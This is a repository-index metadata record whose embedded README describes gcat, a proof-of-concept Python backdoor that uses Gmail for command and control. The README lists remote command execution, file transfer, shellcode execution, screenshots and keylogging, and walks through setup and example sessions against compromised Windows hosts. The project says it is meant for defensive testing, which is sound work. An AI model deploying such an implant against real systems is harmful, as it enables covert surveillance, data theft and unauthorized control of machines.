{"id":13453601,"url":"https://github.com/byt3bl33d3r/gcat","last_synced_at":"2025-09-28T21:30:54.832Z","repository":{"id":33132713,"uuid":"36772254","full_name":"byt3bl33d3r/gcat","owner":"byt3bl33d3r","description":"A PoC backdoor that uses Gmail as a C\u0026C server","archived":true,"fork":false,"pushed_at":"2018-11-16T13:43:15.000Z","size":38,"stargazers_count":1319,"open_issues_count":5,"forks_count":417,"subscribers_count":131,"default_branch":"master","last_synced_at":"2024-09-27T03:23:03.331Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/byt3bl33d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-06-03T01:28:00.000Z","updated_at":"2024-09-18T13:05:17.000Z","dependencies_parsed_at":"2022-07-14T09:22:20.022Z","dependency_job_id":null,"html_url":"https://github.com/byt3bl33d3r/gcat","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2Fgcat","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2Fgcat/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2Fgcat/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2Fgcat/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/byt3bl33d3r","download_url":"https://codeload.github.com/byt3bl33d3r/gcat/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":234563141,"owners_count":18853060,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T08:00:44.173Z","updated_at":"2025-09-28T21:30:54.565Z","avatar_url":"https://github.com/byt3bl33d3r.png","language":"Python","funding_links":[],"categories":["Python","Uncategorized","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","Tools","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具","\u003ca id=\"d2041a55efcfc29ca6a257916255b43b\"\u003e\u003c/a\u003eGMail"],"sub_categories":["Uncategorized","\u003ca id=\"98a851c8e6744850efcb27b8e93dff73\"\u003e\u003c/a\u003eC\u0026C","\u003ca id=\"be2346c808f9813f13da3526576e1839\"\u003e\u003c/a\u003e工具","Open Source"],"readme":"# Gcat\nA stealthy Python based backdoor that uses Gmail as a command and control server\n\nThis project was inspired by the original [PoC code](https://bitbucket.org/Zaeyx/gcat) from Benjamin Donnelly\n\n## This is PoC code...\n... that was released for orginazations to test their defenses against these type of attacks. In order to detect them see projects like [RITA](https://github.com/activecm/rita).\n\nFor a more up to date and maintained version of this project see [GDog](https://github.com/maldevel/gdog)\n\n## Setup \n\nFor this to work you need:\n- A Gmail account (**Use a dedicated account! Do not use your personal one!**)\n- Turn on \"Allow less secure apps\" under the security settings of the account\n- You may also have to enable IMAP in the account settings\n\nThis repo contains two files:\n- ```gcat.py``` a script that's used to enumerate and issue commands to available clients\n- ```implant.py``` the actual backdoor to deploy\n\nIn both files, edit the ```gmail_user``` and ```gmail_pwd``` variables with the username and password of the account you previously setup.\n\nYou're probably going to want to compile ```implant.py``` into an executable using [Pyinstaller](https://github.com/pyinstaller/pyinstaller)\n\n**Note: It's recommended you compile implant.py using a 32bit Python installation**\n\n# Usage\n\n```\n                                             dP   \n                                             88   \n                .d8888b. .d8888b. .d8888b. d8888P \n                88'  `88 88'  `\"\" 88'  `88   88   \n                88.  .88 88.  ... 88.  .88   88   \n                `8888P88 `88888P' `88888P8   dP   \n                     .88                          \n                 d8888P  \n                     \n\n                   .__....._             _.....__,\n                     .\": o :':         ;': o :\".\n                     `. `-' .'.       .'. `-' .'   \n                       `---'             `---'  \n\n             _...----...      ...   ...      ...----..._\n          .-'__..-''----    `.  `\"`  .'    ----'''-..__`-.\n         '.-'   _.--'''       `-._.-'       ''''--._   `-.`\n         '  .-\"'                  :                  `\"-.  `\n           '   `.              _.'\"'._              .'   `\n                 `.       ,.-'\"       \"'-.,       .'\n                   `.                           .'\n              jgs    `-._                   _.-'\n                         `\"'--...___...--'\"`\n\n                     ...IM IN YUR COMPUTERZ...\n\n                        WATCHIN YUR SCREENZ\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --version         show program's version number and exit\n  -id ID                Client to target\n  -jobid JOBID          Job id to retrieve\n\n  -list                 List available clients\n  -info                 Retrieve info on specified client\n\nCommands:\n  Commands to execute on an implant\n\n  -cmd CMD              Execute a system command\n  -download PATH        Download a file from a clients system\n  -upload SRC DST       Upload a file to the clients system\n  -exec-shellcode FILE  Execute supplied shellcode on a client\n  -screenshot           Take a screenshot\n  -lock-screen          Lock the clients screen\n  -force-checkin        Force a check in\n  -start-keylogger      Start keylogger\n  -stop-keylogger       Stop keylogger\n\nMeow!\n\n```\n\n- Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:\n```\n#~ python gcat.py -list\nf964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86\n90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86\n```\nThe output is a UUID string that uniquely identifies the system and the OS the implant is running on\n\n\n- Let's issue a command to an implant:\n```\n#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'\n[*] Command sent successfully with jobid: SH3C4gv\n```\nHere we are telling ```90b2cd83-cb36-52de-84ee-99db6ff41a11``` to execute ```ipconfig /all```, the script then outputs the ```jobid``` that we can use to retrieve the output of that command\n\n- Lets get the results!\n```\n#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     \nDATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'\nJOBID: SH3C4gv\nFG WINDOW: 'Command Prompt - C:\\Python27\\python.exe implant.py'\nCMD: 'ipconfig /all'\n\n\nWindows IP Configuration\n\n        Host Name . . . . . . . . . . . . : unknown-2d44b52\n        Primary Dns Suffix  . . . . . . . : \n        Node Type . . . . . . . . . . . . : Unknown\n        IP Routing Enabled. . . . . . . . : No\n        WINS Proxy Enabled. . . . . . . . : No\n\n-- SNIP --\n```\n\n- That's the gist of it! But you can do much more as you can see from the usage of the script! ;)\n\n# To Do\n\n- Multi-platform support\n- ~~Command to upload files~~\n- Transport crypto \u0026 obfuscation\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbyt3bl33d3r%2Fgcat","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbyt3bl33d3r%2Fgcat","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbyt3bl33d3r%2Fgcat/lists"}